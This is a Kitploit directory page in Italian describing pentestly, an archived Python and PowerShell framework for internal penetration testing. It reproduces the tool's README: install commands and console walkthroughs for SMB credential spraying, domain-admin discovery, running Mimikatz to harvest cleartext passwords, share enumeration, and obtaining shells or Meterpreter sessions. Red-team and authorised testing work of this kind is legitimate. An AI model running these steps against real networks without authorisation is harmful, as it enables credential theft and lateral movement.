Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
pentestly — Framework di penetration testing interno in Python e PowerShell | Kitploit
Strumenti/GitHubGitHub/praetorian-inc/pentestly
Frameworks per Penetration TestingEscalation di PrivilegiRicognizioneAttacchi alle PasswordExploitMovimento LateraleRaccolta InformazioniPost-ExploitPenetration TestingCommand and ControlRed Teaming
7211372110 anni faRevisionato da Kitploit
Archived
GitHubpraetorian-inc/pentestly

pentestly

Framework di penetration testing interno in Python e PowerShell

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Pentestly

Pentestly è una combinazione di strumenti Python in espansione per l'uso in test di penetrazione. L'obiettivo è utilizzare un'interfaccia utente familiare mentre si rendono facili i contributi al framework con la potenza di Python.

Blog post: Pentestly Framework: quando il pentesting incontra Python e Powershell

Autore: @ctfhacker / Cory Duplantis

Demo

asciicast

Funzionalità attuali

  • Importare XML di NMAP
  • Testare l'autenticazione SMB utilizzando:
    • credenziali individuali
    • file contenente credenziali
    • credenziali nulle
    • hash NTLM
  • Testare i privilegi di amministratore locale per l'autenticazione SMB riuscita
  • Identificare le condivisioni SMB leggibili per credenziali valide
  • Memorizzare i nomi degli account amministratore di dominio/azienda
  • Determinare la posizione dei processi di amministratore di dominio in esecuzione
  • Determinare i sistemi degli amministratori di dominio connessi
  • Eseguire comandi Powershell in memoria ed esfiltrare i risultati
  • Eseguire Mimikatz per raccogliere password in chiaro dalla memoria (Invoke-Mimikatz.ps1)
  • Ricevere una shell di comandi (Powercat)
  • Ricevere una sessione meterpreter (Invoke-Shellcode.ps1)

Spalle dei Giganti

Pentestly si basa sulle spalle dei giganti. Di seguito sono elencati gli strumenti attualmente utilizzati in Pentestly:

  • recon-ng - Database di backend per recon-ng è splendidamente realizzato e sfruttato in Pentestly per la manipolazione dei dati

  • wmiexec.py - Ci permette di eseguire comandi Powershell rapidamente e facilmente tramite WMI

  • smbmap.py - Utilità utile per enumerare le condivisioni SMB

  • Invoke-Mimikatz.ps1 - Implementazione di Mimikatz in Powershell

  • powercat.ps1 - Funzionalità simile a Netcat in Powershell

  • Invoke-Shellcode.ps1 - Distribuire Meterpreter in Powershell

  • CrackMapExec - Fonte di ispirazione per il semplice server Mimikatz in Pentestly

Installazione

git clone https://github.com/praetorian-inc/pentestly.git
./install.sh
./pentestly

Utilizzo

Esaminiamo diverse funzioni attualmente implementate.

Cambiare workspace

[pentestly][default] > workspaces list

  +------------+
  | Workspaces |
  +------------+
  | default    |
  +------------+

[pentestly][default] > workspaces add project
[pentestly][project] > workspaces select project

Caricare da nmap

[pentestly][project][nmap_xml] > load nmap
[pentestly][project][nmap_xml] > set filename /root/PROJECT/full-all-alive.xml
FILENAME => /root/PROJECT/full-all-alive.xml
[pentestly][project][nmap_xml] > show options

  Name      Current Value                      Required  Description
  --------  -------------                      --------  -----------
  FILENAME  /root/PROJECT/full-all-alive.xml  yes       Path and filename for nmap XML input

[pentestly][project][nmap_xml] > run

Testare i login

Usa file con credenziali per testare il login

[pentestly][project][login] > cat /tmp/creds
[*] Command: cat /tmp/creds
user1 pass1
user2 pass2
[pentestly][project][login] > load login
[pentestly][project][login] > set userpass_file /tmp/creds
USERPASS_FILE => /tmp/creds
[pentestly][project][login] > set username ''
USERNAME => ''
[pentestly][project][login] > set password ''
PASSWORD => ''
[pentestly][project][login] > run

Usa un singolo nome utente e password

[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run

Usa credenziali su un piccolo sottoinsieme di IP es. sulla subnet 192.168.8.0/24 trovata nella tabella

[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run
[pentestly][project][login] > set source query select * from pentestly_creds where host like '192.168.8.%'

Raccogliere amministratori di dominio e azienda

[pentestly][project][login] > load get_domain # Nota la ricerca fuzzy - get_domain trova get_domain_admin_names
[pentestly][project][get_domain_admin_names] > show options

  Name    Current Value  Required  Description
  ------  -------------  --------  -----------
  SOURCE  default        yes       source of input (see 'show info' for details)

[pentestly][project][get_domain_admin_names] > run
[*] Found Domain Admin: domain\admin1
[*] Found Domain Admin: domain\admin2

Eseguire mimikatz su IP con diritti di esecuzione

[pentestly][default][get_domain_admin_names] > load mimi
[pentestly][default][mimikatz] > run
Select local interface for hosting scripts

0. 127.0.0.1
1. 10.220.8.94
2. 172.27.67.14
> 1

[*] Execution creds: domain\Admin:[email protected]
[*] Success! Admin.DA:p@$$w0rd  - DOMAIN ADMIN!

Mostra amministratori locali

[pentestly][default][show_local_admins] > load show_local_admins
[pentestly][default][show_local_admins] > run

+---------------------------------------------------------------------------------------------------------------+
|      host      | access |  username  |  password  | domain | process | logged_in | success | execute | module |
+---------------------------------------------------------------------------------------------------------------+
| 10.202.208.112 |        | nsportsman | password1! | zojix  |         |           | True    | True    | login  |
+---------------------------------------------------------------------------------------------------------------+

Mostra amministratori di dominio

[pentestly][default][show_domain_admins] > load show_domain_admins
[pentestly][default][show_domain_admins] > run

+--------------------------------------------------------------------------------------------------------------------------+
|      host      | access        | username  |  password       | domain | process | logged_in | success | execute | module |
+--------------------------------------------------------------------------------------------------------------------------+
| 10.202.208.112 | Domain Admin  | TheRealDA | </l33TPassword> | zojix  |         |           | True    | True    | login  |
+--------------------------------------------------------------------------------------------------------------------------+

Enumshares

[pentestly][default] > load enums
[pentestly][default][enumshares] > run
[*] Execution creds: workgroup\Administrator:[email protected]
defaultdict(<type 'list'>, {'readonly': [u'ADMIN$', u'C', u'C$', u'Users'], 'noaccess': [u'IPC$']})

Mostra nuove condivisioni

[pentestly][default][interesting_files] > show pentestly_shares
Scarica lo strumento